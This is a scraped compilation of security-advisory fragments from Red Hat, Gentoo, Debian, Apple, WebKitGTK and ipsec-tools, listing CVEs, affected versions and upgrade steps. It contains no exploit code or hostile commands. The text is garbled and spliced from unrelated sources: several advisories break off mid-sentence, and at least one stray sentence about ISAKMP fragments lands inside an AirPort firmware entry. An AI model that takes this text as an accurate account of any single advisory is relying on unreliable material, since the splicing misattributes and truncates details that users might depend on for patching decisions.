1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv
1791753 - [RFE] [SSP] Template validator should check validations in template's parent template
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic
1848954 - KMP missing CA extensions in cabundle of mutatingwebhookconfiguration
1848956 - KMP requires downtime for CA stabilization during certificate rotation
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1853911 - VM with dot in network name fails to start with unclear message
1854098 - NodeNetworkState on workers doesn't have "status" key due to nmstate-handler pod failure to run "nmstatectl show"
1856347 - SR-IOV : Missing network name for sriov during vm setup
1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1859235 - Common Templates - after upgrade there are 2 common templates per each os-workload-flavor combination
1860714 - No API information from `oc explain`
1860992 - CNV upgrade - users are not removed from privileged SecurityContextConstraints
1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem
1866593 - CDI is not handling vm disk clone
1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
1868817 - Container-native Virtualization 2.6.0 Images
1873771 - Improve the VMCreationFailed error message caused by VM low memory
1874812 - SR-IOV: Guest Agent expose link-local ipv6 address for sometime and then remove it
1878499 - DV import doesn't recover from scratch space PVC deletion
1879108 - Inconsistent naming of "oc virt" command in help text
1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running
1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT
1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability
1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message
1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used
1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, *before* the NodeNetworkConfigurationPolicy is applied
1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
The tcpdump packages contain the tcpdump utility for monitoring network
traffic. The tcpdump utility can capture and display the packet headers on
a particular network interface or on all interfaces.
The following packages have been upgraded to a later upstream version:
tcpdump (4.9.3).
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.3 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AppStream (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7 |
|
var-201912-0579
|
A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Arbitrary code execution * Insufficient access restrictions * information leak * Service operation interruption (DoS) * Information falsification * Privilege escalation * Sandbox avoidance. Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A cross-site scripting vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 12.4; Windows-based iTunes prior to 12.9.6; tvOS prior to 12.4; Safari prior to 12.1.2; macOS Mojave prior to 10.14.6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201909-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebkitGTK+: Multiple vulnerabilities
Date: September 06, 2019
Bugs: #683234, #686216, #693122
ID: 201909-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebkitGTK+, the worst of
which could result in the arbitrary execution of code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.24.4 >= 2.24.4
Description
===========
Multiple vulnerabilities have been discovered in WebkitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.24.4"
References
==========
[ 1 ] CVE-2019-11070
https://nvd.nist.gov/vuln/detail/CVE-2019-11070
[ 2 ] CVE-2019-6201
https://nvd.nist.gov/vuln/detail/CVE-2019-6201
[ 3 ] CVE-2019-6251
https://nvd.nist.gov/vuln/detail/CVE-2019-6251
[ 4 ] CVE-2019-7285
https://nvd.nist.gov/vuln/detail/CVE-2019-7285
[ 5 ] CVE-2019-7292
https://nvd.nist.gov/vuln/detail/CVE-2019-7292
[ 6 ] CVE-2019-8503
https://nvd.nist.gov/vuln/detail/CVE-2019-8503
[ 7 ] CVE-2019-8506
https://nvd.nist.gov/vuln/detail/CVE-2019-8506
[ 8 ] CVE-2019-8515
https://nvd.nist.gov/vuln/detail/CVE-2019-8515
[ 9 ] CVE-2019-8518
https://nvd.nist.gov/vuln/detail/CVE-2019-8518
[ 10 ] CVE-2019-8523
https://nvd.nist.gov/vuln/detail/CVE-2019-8523
[ 11 ] CVE-2019-8524
https://nvd.nist.gov/vuln/detail/CVE-2019-8524
[ 12 ] CVE-2019-8535
https://nvd.nist.gov/vuln/detail/CVE-2019-8535
[ 13 ] CVE-2019-8536
https://nvd.nist.gov/vuln/detail/CVE-2019-8536
[ 14 ] CVE-2019-8544
https://nvd.nist.gov/vuln/detail/CVE-2019-8544
[ 15 ] CVE-2019-8551
https://nvd.nist.gov/vuln/detail/CVE-2019-8551
[ 16 ] CVE-2019-8558
https://nvd.nist.gov/vuln/detail/CVE-2019-8558
[ 17 ] CVE-2019-8559
https://nvd.nist.gov/vuln/detail/CVE-2019-8559
[ 18 ] CVE-2019-8563
https://nvd.nist.gov/vuln/detail/CVE-2019-8563
[ 19 ] CVE-2019-8595
https://nvd.nist.gov/vuln/detail/CVE-2019-8595
[ 20 ] CVE-2019-8607
https://nvd.nist.gov/vuln/detail/CVE-2019-8607
[ 21 ] CVE-2019-8615
https://nvd.nist.gov/vuln/detail/CVE-2019-8615
[ 22 ] CVE-2019-8644
https://nvd.nist.gov/vuln/detail/CVE-2019-8644
[ 23 ] CVE-2019-8644
https://nvd.nist.gov/vuln/detail/CVE-2019-8644
[ 24 ] CVE-2019-8649
https://nvd.nist.gov/vuln/detail/CVE-2019-8649
[ 25 ] CVE-2019-8649
https://nvd.nist.gov/vuln/detail/CVE-2019-8649
[ 26 ] CVE-2019-8658
https://nvd.nist.gov/vuln/detail/CVE-2019-8658
[ 27 ] CVE-2019-8658
https://nvd.nist.gov/vuln/detail/CVE-2019-8658
[ 28 ] CVE-2019-8666
https://nvd.nist.gov/vuln/detail/CVE-2019-8666
[ 29 ] CVE-2019-8666
https://nvd.nist.gov/vuln/detail/CVE-2019-8666
[ 30 ] CVE-2019-8669
https://nvd.nist.gov/vuln/detail/CVE-2019-8669
[ 31 ] CVE-2019-8669
https://nvd.nist.gov/vuln/detail/CVE-2019-8669
[ 32 ] CVE-2019-8671
https://nvd.nist.gov/vuln/detail/CVE-2019-8671
[ 33 ] CVE-2019-8671
https://nvd.nist.gov/vuln/detail/CVE-2019-8671
[ 34 ] CVE-2019-8672
https://nvd.nist.gov/vuln/detail/CVE-2019-8672
[ 35 ] CVE-2019-8672
https://nvd.nist.gov/vuln/detail/CVE-2019-8672
[ 36 ] CVE-2019-8673
https://nvd.nist.gov/vuln/detail/CVE-2019-8673
[ 37 ] CVE-2019-8673
https://nvd.nist.gov/vuln/detail/CVE-2019-8673
[ 38 ] CVE-2019-8676
https://nvd.nist.gov/vuln/detail/CVE-2019-8676
[ 39 ] CVE-2019-8676
https://nvd.nist.gov/vuln/detail/CVE-2019-8676
[ 40 ] CVE-2019-8677
https://nvd.nist.gov/vuln/detail/CVE-2019-8677
[ 41 ] CVE-2019-8677
https://nvd.nist.gov/vuln/detail/CVE-2019-8677
[ 42 ] CVE-2019-8678
https://nvd.nist.gov/vuln/detail/CVE-2019-8678
[ 43 ] CVE-2019-8678
https://nvd.nist.gov/vuln/detail/CVE-2019-8678
[ 44 ] CVE-2019-8679
https://nvd.nist.gov/vuln/detail/CVE-2019-8679
[ 45 ] CVE-2019-8679
https://nvd.nist.gov/vuln/detail/CVE-2019-8679
[ 46 ] CVE-2019-8680
https://nvd.nist.gov/vuln/detail/CVE-2019-8680
[ 47 ] CVE-2019-8680
https://nvd.nist.gov/vuln/detail/CVE-2019-8680
[ 48 ] CVE-2019-8681
https://nvd.nist.gov/vuln/detail/CVE-2019-8681
[ 49 ] CVE-2019-8681
https://nvd.nist.gov/vuln/detail/CVE-2019-8681
[ 50 ] CVE-2019-8683
https://nvd.nist.gov/vuln/detail/CVE-2019-8683
[ 51 ] CVE-2019-8683
https://nvd.nist.gov/vuln/detail/CVE-2019-8683
[ 52 ] CVE-2019-8684
https://nvd.nist.gov/vuln/detail/CVE-2019-8684
[ 53 ] CVE-2019-8684
https://nvd.nist.gov/vuln/detail/CVE-2019-8684
[ 54 ] CVE-2019-8686
https://nvd.nist.gov/vuln/detail/CVE-2019-8686
[ 55 ] CVE-2019-8686
https://nvd.nist.gov/vuln/detail/CVE-2019-8686
[ 56 ] CVE-2019-8687
https://nvd.nist.gov/vuln/detail/CVE-2019-8687
[ 57 ] CVE-2019-8687
https://nvd.nist.gov/vuln/detail/CVE-2019-8687
[ 58 ] CVE-2019-8688
https://nvd.nist.gov/vuln/detail/CVE-2019-8688
[ 59 ] CVE-2019-8688
https://nvd.nist.gov/vuln/detail/CVE-2019-8688
[ 60 ] CVE-2019-8689
https://nvd.nist.gov/vuln/detail/CVE-2019-8689
[ 61 ] CVE-2019-8689
https://nvd.nist.gov/vuln/detail/CVE-2019-8689
[ 62 ] CVE-2019-8690
https://nvd.nist.gov/vuln/detail/CVE-2019-8690
[ 63 ] CVE-2019-8690
https://nvd.nist.gov/vuln/detail/CVE-2019-8690
[ 64 ] WSA-2019-0002
https://webkitgtk.org/security/WSA-2019-0002.html
[ 65 ] WSA-2019-0004
https://webkitgtk.org/security/WSA-2019-0004.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201909-05
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
- -------------------------------------------------------------------------
Debian Security Advisory DSA-4515-1 security@debian.org
https://www.debian.org/security/ Alberto Garcia
September 04, 2019 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : webkit2gtk
CVE ID : CVE-2019-8644 CVE-2019-8649 CVE-2019-8658 CVE-2019-8666
CVE-2019-8669 CVE-2019-8671 CVE-2019-8672 CVE-2019-8673
CVE-2019-8676 CVE-2019-8677 CVE-2019-8678 CVE-2019-8679
CVE-2019-8680 CVE-2019-8681 CVE-2019-8683 CVE-2019-8684
CVE-2019-8686 CVE-2019-8687 CVE-2019-8688 CVE-2019-8689
CVE-2019-8690
Several vulnerabilities have been discovered in the webkit2gtk web
engine:
CVE-2019-8644
G.
For the stable distribution (buster), these problems have been fixed in
version 2.24.4-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-8-13-2 Additional information for
APPLE-SA-2019-7-22-1 iOS 12.4
iOS 12.4 addresses the following:
Bluetooth
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)
Description: An input validation issue existed in Bluetooth.
CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole
Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of
University of Oxford, England
Entry added August 13, 2019
Core Data
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8646: Natalie Silvanovich of Google Project Zero
Core Data
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8647: Samuel Groß and Natalie Silvanovich of Google Project
Zero
Core Data
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8660: Samuel Groß and Natalie Silvanovich of Google Project
Zero
FaceTime
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8648: Tao Huang and Tielei Wang of Team Pangu
Found in Apps
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to leak memory
Description: This issue was addressed with improved checks.
CVE-2019-8663: Natalie Silvanovich of Google Project Zero
Foundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8641: Samuel Groß and Natalie Silvanovich of Google Project
Zero
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: An issue existed in Samba that may allow attackers to perform
unauthorized actions by intercepting communications between services
Description: This issue was addressed with improved checks to prevent
unauthorized actions.
CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team
and Catalyst
libxslt
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to view sensitive information
Description: A stack overflow was addressed with improved input
validation.
CVE-2019-13118: found by OSS-Fuzz
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may cause an unexpected application
termination
Description: A denial of service issue was addressed with improved
validation.
CVE-2019-8665: Michael Hernandez of XYZ Marketing
Profiles
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A malicious application may be able to restrict access to
websites
Description: A validation issue existed in the entitlement
verification.
CVE-2019-8698: Luke Deshotels, Jordan Beichler, and William Enck of
North Carolina State University; Costin Carabaș and Răzvan Deaconescu
of University POLITEHNICA of Bucharest
Quick Look
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: An attacker may be able to trigger a use-after-free in an
application deserializing an untrusted NSDictionary
Description: This issue was addressed with improved checks.
CVE-2019-8662: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Siri
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8646: Natalie Silvanovich of Google Project Zero
Telephony
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: The initiator of a phone call may be able to cause the
recipient to answer a simultaneous Walkie-Talkie connection
Description: A logic issue existed in the answering of phone calls.
CVE-2019-8699: Marius Alexandru Boeru (@mboeru) and an anonymous
researcher
UIFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: Parsing a maliciously crafted office document may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Wallet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: A user may inadvertently complete an in-app purchase while on
the lock screen
Description: The issue was addressed with improved UI handling.
CVE-2019-8690: Sergei Glazunov of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue existed in the handling of synchronous
page loads.
CVE-2019-8649: Sergei Glazunov of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day
Initiative
CVE-2019-8687: Apple
CVE-2019-8688: Insu Yun of SSLab at Georgia Tech
CVE-2019-8689: lokihardt of Google Project Zero
Additional recognition
Game Center
We would like to acknowledge Min (Spark) Zheng and Xiaolong Bai of
Alibaba Inc. for their assistance.
MobileInstallation
We would like to acknowledge Dany Lisiansky (@DanyL931) for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12.4".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAl1S688pHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3H8AxAA
x7PkVYpHr8NsjIwvei5DcsiDtOTNCjfaFMpmfdwgCNvDOYj5L15F1QBDIrfUHkqi
D+1H/oJNzLI7cD1/UqbFz5ZhnPoFtjASCnVvDBBfCfOtL3sYRYjbtUEKWFQOx7i2
BLwiUJIkg9pxdrU0Gw7dd8IgII9pK5zPwRgFfrHuNZrBnOkG6JPC9QX+PjP8RUC9
eRFuRzDYBk5UydpwkhWI3RxVg+BcZRh17TRc2gu3osAqPL8sE9FqXhUWQIMEmY78
gDkDEUKht002PLGiBP6LK3r9UXR5OEAu64nMJLBoXXMUX3GK77mN8mroEGJf48l3
C7wKrRg3j0T9N+EDNX/avl3n4r70ixhsGhKqJjqJMBEAhrBfQ/8aMFb0FdrdC3f8
GAxm57MetIE65YzbWmTZoUX0CS9MmKIj9JJMFqcxyP2jNibLbouzAH08N7eTktF/
fsLYrisu3srFalLFr22la4fwaLPYKMZ8huBONGttLhvFs+jYjFZCyzEXCXjyXuZi
UjJ90aLnlqHKOQfeu865GAumDP5+9jVRDOpBTMFmR5pj86UCZttTDqMGmW2/EpQ/
LeOyNUGJlq5Lc35/R37YILE6FIjKcfwl3CDUsok1f8RUag5AtcU6s3LlNdzJ+szu
9SsbxcGzn+NbcDU4i53OHyNNkcECGdn86Y+MBPXYrek=
=Eo2f
-----END PGP SIGNATURE-----
. ------------------------------------------------------------------------
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0004
------------------------------------------------------------------------
Date reported : August 29, 2019
Advisory ID : WSA-2019-0004
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0004.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0004.html
CVE identifiers : CVE-2019-8644, CVE-2019-8649, CVE-2019-8658,
CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,
CVE-2019-8672, CVE-2019-8673, CVE-2019-8676,
CVE-2019-8677, CVE-2019-8678, CVE-2019-8679,
CVE-2019-8680, CVE-2019-8681, CVE-2019-8683,
CVE-2019-8684, CVE-2019-8686, CVE-2019-8687,
CVE-2019-8688, CVE-2019-8689, CVE-2019-8690.
Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.
CVE-2019-8644
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to G. Geshev working with Trend Micro's Zero Day Initiative.
CVE-2019-8649
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Sergei Glazunov of Google Project Zero.
CVE-2019-8658
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to akayn working with Trend Micro's Zero Day Initiative.
CVE-2019-8666
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security
Response Center of Qihoo 360 Technology Co. Ltd.
CVE-2019-8669
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to akayn working with Trend Micro's Zero Day Initiative.
CVE-2019-8671
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Apple.
CVE-2019-8672
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Samuel Groß of Google Project Zero.
CVE-2019-8673
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech.
CVE-2019-8676
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech.
CVE-2019-8677
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Jihui Lu of Tencent KeenLab.
CVE-2019-8678
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to an anonymous researcher, Anthony Lai (@darkfloyd1014) of
Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a)
of Theori, Johnny Yu (@straight_blast) of VX Browser Exploitation
Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group,
Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho
(@alan_h0) of Knownsec, Byron Wai of VX Browser Exploitation.
CVE-2019-8679
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Jihui Lu of Tencent KeenLab.
CVE-2019-8680
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Jihui Lu of Tencent KeenLab.
CVE-2019-8681
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to G. Geshev working with Trend Micro Zero Day Initiative.
CVE-2019-8683
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to lokihardt of Google Project Zero.
CVE-2019-8684
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to lokihardt of Google Project Zero.
CVE-2019-8686
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to G. Geshev working with Trend Micro's Zero Day Initiative.
CVE-2019-8687
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Apple.
CVE-2019-8688
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Insu Yun of SSLab at Georgia Tech.
CVE-2019-8689
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to lokihardt of Google Project Zero.
CVE-2019-8690
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Sergei Glazunov of Google Project Zero.
We recommend updating to the latest stable versions of WebKitGTK and WPE
WebKit. It is the best way to ensure that you are running safe versions
of WebKit. Please check our websites for information about the latest
stable releases.
Further information about WebKitGTK and WPE WebKit security advisories
can be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.
The WebKitGTK and WPE WebKit team,
August 29, 2019
|
|
var-200905-0196
|
racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote attackers to cause a denial of service (crash) via crafted fragmented packets without a payload, which triggers a NULL pointer dereference. Ipsec-tools of racoon/isakmp_frag.c Has a deficiency in handling fragmented packets with no payload, resulting in denial of service (DoS) There is a vulnerability that becomes a condition.Service operation disruption to a third party (DoS) There is a possibility of being put into a state. IPsec-Tools is affected by multiple remote denial-of-service vulnerabilities because the software fails to properly handle certain network packets.
Versions prior to IPsec-Tools 0.7.2 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2010-12-16-1 Time Capsule and AirPort Base Station
(802.11n) Firmware 7.5.2
Time Capsule and AirPort Base Station (802.11n) Firmware 7.5.2 is
now available and addresses the following:
CVE-ID: CVE-2008-4309
Available for: AirPort Extreme Base Station with 802.11n,
AirPort Express Base Station with 802.11n, Time Capsule
Impact: A remote attacker may terminate the operation of the SNMP
service
Description: An integer overflow exists in the
netsnmp_create_subtree_cache function. By default, the
'WAN SNMP' configuration option is disabled, and the SNMP service is
accessible only to other devices on the local network. This issue is
addressed by applying the Net-SNMP patches.
CVE-ID: CVE-2009-2189
Available for: AirPort Extreme Base Station with 802.11n,
AirPort Express Base Station with 802.11n, Time Capsule
Impact: Receiving a large number of IPv6 Router Advertisement (RA)
and Neighbor Discovery (ND) packets from a system on the local
network may cause the base station to restart
Description: A resource consumption issue exists in the base
station's handling of Router Advertisement (RA) and Neighbor
Discovery (ND) packets. A system on the local network may send a
large number of RA and ND packets that could exhaust the base
station's resources, causing it to restart unexpectedly. This issue
is addressed by rate limiting incoming ICMPv6 packets. Credit to
Shoichi Sakane of the KAME project, Kanai Akira of Internet Multifeed
Co., Shirahata Shin and Rodney Van Meter of Keio University, and
Tatuya Jinmei of Internet Systems Consortium, Inc. for reporting this
issue.
CVE-ID: CVE-2010-0039
Available for: AirPort Extreme Base Station with 802.11n,
AirPort Express Base Station with 802.11n, Time Capsule
Impact: An attacker may be able to query services behind an AirPort
Base Station or Time Capsule's NAT from the source IP of the router,
if any system behind the NAT has a portmapped FTP server
Description: The AirPort Extreme Base Station and Time Capsule's
Application-Level Gateway (ALG) rewrites incoming FTP traffic,
including PORT commands, to appear as if it is the source. An
attacker with write access to an FTP server inside the NAT may issue
a malicious PORT command, causing the ALG to send attacker-supplied
data to an IP and port behind the NAT. As the data is resent from the
Base Station, it could potentially bypass any IP-based restrictions
for the service. This issue is addressed by not rewriting inbound
PORT commands via the ALG. Credit to Sabahattin Gucukoglu for
reporting this issue. This issue is addressed
through improved validation of fragmented ISAKMP packets.
CVE-ID: CVE-2010-1804
Available for: AirPort Extreme Base Station with 802.11n,
AirPort Express Base Station with 802.11n, Time Capsule
Impact: A remote attacker may cause the device to stop processing
network traffic
Description: An implementation issue exists in the network bridge.
Sending a maliciously crafted DHCP reply to the device may cause it
to stop responding to network traffic. This issue affects devices
that have been configured to act as a bridge, or are configured in
Network Address Translation (NAT) mode with a default host enabled.
By default, the device operates in NAT mode, and no default host is
configured. This update addresses the issue through improved handling
of DHCP packets on the network bridge. Credit to Stefan R. Filipek
for reporting this issue.
Installation note for Firmware version 7.5.2
Firmware version 7.5.2 is installed into Time Capsule or AirPort Base
Station with 802.11n via AirPort Utility, provided with the device.
It is recommended that AirPort Utility 5.5.2 be installed before
upgrading to Firmware version 7.5.2.
AirPort Utility 5.5.2 may be obtained through Apple's Software
Download site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (Darwin)
iQEcBAEBAgAGBQJNCWXyAAoJEGnF2JsdZQeevTQH/0856gTUzzmL371/nSkhn3qq
MCPQVaEMe8O/jy96nlskwzp3X0X0QmXePok1enp6QhDhHm0YL3a4q7YHd4zjm6mM
JUoVR4JJRSKOb1bVdEXqo+qG/PH7/5ywfrGas+MjOshMa3gnhYVee39N7Xtz0pHD
3ZllZRwGwad1sQLL7DhJKZ92z6t2GfHoJyK4LZNemkQAL1HyUu7Hj9SlljcVB+Ub
xNnpmBXJcCZzp4nRQM+fbLf6bdZ1ua5DTc1pXC8vETtxyHc53G/vLCu8SKBnTBlK
JmkpGwG5fXNuYLL8ArFUuEu3zhE7kfdeftUrEez3YeL2DgU9iB8m8RkuuSrVJEY=
=WPH8
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200905-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: IPSec Tools: Denial of Service
Date: May 24, 2009
Bugs: #267135
ID: 200905-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
